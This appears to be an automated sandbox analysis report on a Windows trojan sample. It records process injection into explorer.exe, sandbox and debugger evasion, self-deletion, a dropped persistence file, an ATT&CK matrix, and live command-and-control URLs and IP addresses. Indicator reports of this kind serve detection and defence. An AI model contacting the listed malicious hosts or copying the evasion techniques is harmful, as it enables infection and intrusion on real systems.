      barindex
      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cip:W;.cer:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\fbtdajhUnpacked PE file: 4.2.fbtdajh.400000.0.unpack .text:ER;.rdata:R;.data:W;.cip:W;.cer:W;.rsrc:R; vs .text:EW;
      Source: file.exeStatic PE information: section name: .cip
      Source: file.exeStatic PE information: section name: .cer
      Source: fbtdajh.2.drStatic PE information: section name: .cip
      Source: fbtdajh.2.drStatic PE information: section name: .cer
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A2C1 push 686E5183h; ret 0_2_02C2A2D0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A1CD push 686EA783h; ret 0_2_02C2A1FC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A2D1 push 686E5683h; ret 0_2_02C2A2E0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A2E1 push 686E5783h; ret 0_2_02C2A2F0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A2F1 push 686E5483h; ret 0_2_02C2A300
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A1FE push 686EA483h; ret 0_2_02C2A20C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A281 push 686E5D83h; ret 0_2_02C2A290
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A38D push 686E4283h; ret 0_2_02C2A39C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A1A5 push 686EA083h; ret 0_2_02C2A1CC
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C229AD pushfd ; iretd 0_2_02C229AE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C21EB0 push B63524ADh; retn 001Fh0_2_02C21EE7
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A2B1 push 686E5083h; ret 0_2_02C2A2C0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A261 push 686E5F83h; ret 0_2_02C2A270
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A36D push 686E4C83h; ret 0_2_02C2A37C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A271 push 686E5C83h; ret 0_2_02C2A280
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A17D push 686EAD83h; ret 0_2_02C2A1A4
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A37D push 686E4D83h; ret 0_2_02C2A38C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A301 push 686E5583h; ret 0_2_02C2A310
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A20E push 686EA583h; ret 0_2_02C2A21C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C23B0D push esp; ret 0_2_02C23B0F
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A311 push 686E4A83h; ret 0_2_02C2A320
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A21E push 686E5A83h; ret 0_2_02C2A22C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A321 push 686E4B83h; ret 0_2_02C2A330
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A12B push 686EAE03h; ret 0_2_02C2A17C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C2A22D push 686E5883h; ret 0_2_02C2A244
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04791540 pushad ; ret 0_2_04791550
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_004031DB push eax; ret 4_2_004032AB
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_02C131AD pushfd ; iretd 4_2_02C131AE
      Source: file.exeStatic PE information: section name: .text entropy: 7.5080418109409415
      Source: fbtdajh.2.drStatic PE information: section name: .text entropy: 7.5080418109409415
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fbtdajhJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fbtdajhJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fbtdajh:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
      Source: C:\Users\user\AppData\Roaming\fbtdajhAPI/Special instruction interceptor: Address: 7FFDB442E814
      Source: C:\Users\user\AppData\Roaming\fbtdajhAPI/Special instruction interceptor: Address: 7FFDB442D584
      Source: fbtdajh, 00000004.00000002.2508869911.0000000002BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: file.exe, 00000000.00000002.2253290608.0000000002C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK9
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 437Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1219Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 800Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3688Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2656Thread sleep count: 437 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4156Thread sleep count: 1219 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4156Thread sleep time: -121900s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2960Thread sleep count: 800 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2960Thread sleep time: -80000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3476Thread sleep count: 299 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3704Thread sleep count: 320 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3704Thread sleep time: -32000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5676Thread sleep count: 290 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4156Thread sleep count: 3688 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4156Thread sleep time: -368800s >= -30000sJump to behavior
      Source: explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
      Source: explorer.exe, 00000002.00000000.2238006366.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
      Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
      Source: explorer.exe, 00000002.00000000.2237496899.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
      Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
      Source: explorer.exe, 00000002.00000000.2237496899.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
      Source: explorer.exe, 00000002.00000000.2243162082.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
      Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000002.00000000.2230566658.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02C1F991 push dword ptr fs:[00000030h]0_2_02C1F991
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0479092B mov eax, dword ptr fs:[00000030h]0_2_0479092B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04790D90 mov eax, dword ptr fs:[00000030h]0_2_04790D90
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_02C10191 push dword ptr fs:[00000030h]4_2_02C10191
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_02CF0D90 mov eax, dword ptr fs:[00000030h]4_2_02CF0D90
      Source: C:\Users\user\AppData\Roaming\fbtdajhCode function: 4_2_02CF092B mov eax, dword ptr fs:[00000030h]4_2_02CF092B

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: fbtdajh.2.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 125.7.253.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.129 80Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: F719A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhThread created: unknown EIP: 79F19A8Jump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\fbtdajhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
      Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2232347125.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.2230566658.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
      Source: explorer.exe, 00000002.00000000.2230925016.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.2238006366.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004173E0 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,0_2_004173E0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000004.00000002.2509117152.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2509592030.00000000047A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping511
      Security Software Discovery
      Remote ServicesData from Local System2
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory12
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials13
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532900 Sample: file.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 21 nwgrus.ru 2->21 27 Suricata IDS alerts for network traffic 2->27 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 33 5 other signatures 2->33 7 file.exe 2->7         started        10 fbtdajh 2->10         started        signatures3 process4 signatures5 35 Detected unpacking (changes PE section rights) 7->35 37 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->37 39 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->39 47 3 other signatures 7->47 12 explorer.exe 52 3 7->12 injected 41 Multi AV Scanner detection for dropped file 10->41 43 Machine Learning detection for dropped file 10->43 45 Maps a DLL or memory area into another process 10->45 process6 dnsIp7 23 nwgrus.ru 125.7.253.10, 49862, 49873, 49884 LGDACOMLGDACOMCorporationKR Korea Republic of 12->23 25 211.171.233.129, 50028, 50030, 50031 LGDACOMLGDACOMCorporationKR Korea Republic of 12->25 17 C:\Users\user\AppData\Roaming\fbtdajh, PE32 12->17 dropped 19 C:\Users\user\...\fbtdajh:Zone.Identifier, ASCII 12->19 dropped 49 System process connects to network (likely due to code injection or exploit) 12->49 51 Benign windows process drops PE files 12->51 53 Deletes itself after installation 12->53 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->55 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.exe42%ReversingLabsWin32.Trojan.Generic
      file.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\fbtdajh100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\fbtdajh42%ReversingLabsWin32.Trojan.Generic
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      125.7.253.10
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://unicea.ws/tmp/index.phptrue
          unknown
          http://nwgrus.ru/tmp/index.phptrue
            unknown
            http://tech-servers.in.net/tmp/index.phptrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2242095283.000000000C3FD000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://api.msn.com/Iexplorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2237496899.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://excel.office.com-explorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://word.office.comMexplorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.microexplorer.exe, 00000002.00000000.2234479094.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2231041832.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2234452297.0000000007B50000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://powerpoint.office.comEMdexplorer.exe, 00000002.00000000.2242095283.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2242095283.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://outlook.comeexplorer.exe, 00000002.00000000.2242095283.000000000C070000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://api.msn.com/explorer.exe, 00000002.00000000.2237496899.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
